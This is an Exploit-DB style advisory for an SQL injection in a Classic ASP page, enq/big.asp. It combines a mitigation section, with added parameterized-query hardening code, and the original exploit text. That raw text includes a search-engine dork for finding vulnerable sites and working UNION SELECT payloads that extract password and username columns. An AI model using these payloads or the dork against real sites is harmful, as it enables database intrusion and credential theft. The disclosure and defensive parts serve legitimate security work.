Vendor: N/A
By: Ra3cH
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A

(big.asp) SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'id' in the 'big.asp' script. The malicious query can be used to extract sensitive information from the database, such as user credentials.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
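
One way to apply this mitigation to a Classic ASP page such as enq/big.asp, as an added example that is not the vendor's code or part of the original advisory: it validates 'id' against a digits-only allow-list and, going one step beyond validation alone, binds the value as a typed ADO parameter instead of concatenating it into the query. The table "items", its columns and Application("ConnStr") are hypothetical, since the advisory does not show the script's source.

```vbscript
<%
' Hardened handling of the "id" query-string parameter (added example).
' Hypothetical names: table "items", columns "title"/"body",
' connection string stored in Application("ConnStr").
Const adCmdText = 1, adInteger = 3, adParamInput = 1   ' standard ADO constants

Dim rawId, re, cmd, rs
rawId = Request.QueryString("id")

' Allow-list: 1 to 9 decimal digits, nothing else.
' IsNumeric() is too loose for this check: it returns True for values
' such as "-999.9", "1e5" and "&H1F".
' A repeated id parameter arrives as "1, 2" and is rejected as well.
Set re = New RegExp
re.Pattern = "^[0-9]{1,9}$"
If Not re.Test(rawId) Then
    Response.Status = "400 Bad Request"
    Response.End
End If

' Bind the value as a typed parameter so it is never parsed as SQL text.
Set cmd = Server.CreateObject("ADODB.Command")
cmd.ActiveConnection = Application("ConnStr")
cmd.CommandType = adCmdText
cmd.CommandText = "SELECT title, body FROM items WHERE id = ?"
cmd.Parameters.Append cmd.CreateParameter("@id", adInteger, adParamInput, , CLng(rawId))

Set rs = cmd.Execute
If rs.EOF Then
    Response.Status = "404 Not Found"
Else
    ' Encode on output so stored data cannot inject markup.
    Response.Write Server.HTMLEncode(rs("title") & "")
End If
rs.Close
Set rs = Nothing
Set cmd = Nothing
%>
```

With this in place, the request shown in the raw data below fails the allow-list check and returns 400 before any query is built.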

Exploit-DB raw data:

*******************************************************************************
# Author   : Ra3cH
# Price    : N/A
# Title    : (big.asp) SQL Injection Vulnerability
# Site     : www.dz4all.com/cc
# Dork     : inurl:enq/big.asp?id=
# Risk     : High
*
**Vulnerable script: enq/big.asp?id= (SQL-injection)
*
---------------------------------------------------------
*
*
**http://server/[path]/enq/big.asp?id=  [SQL Inject]
*
*
**Exploit:
*
*
**-999.9 UNION ALL SELECT null,null,null,null,null,null,null,null,null,null,null,null from user where 1=1
*
*
**Example:
*
*
**http://[site]/enq/big.asp?id=-999.9 UNION ALL SELECT null,null,user_pass,null,null,null,null,null,null,null,null from user where 1=1
*
**or
*
*
**http://[site]/enq/big.asp?id=-999.9 UNION ALL SELECT null,null,null,null,user_name,null,null,null,null,null,null,null from user where 1=1
*
**Admin Login->
*
*
**http://server/[path]/Use your intelligence
*
*""""""""""""""""""""
** Greetz to :     ALLAH
**         All Members of  http://www.DZ4All.cOm/Cc
**          And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & T O X ! N £ & n2n &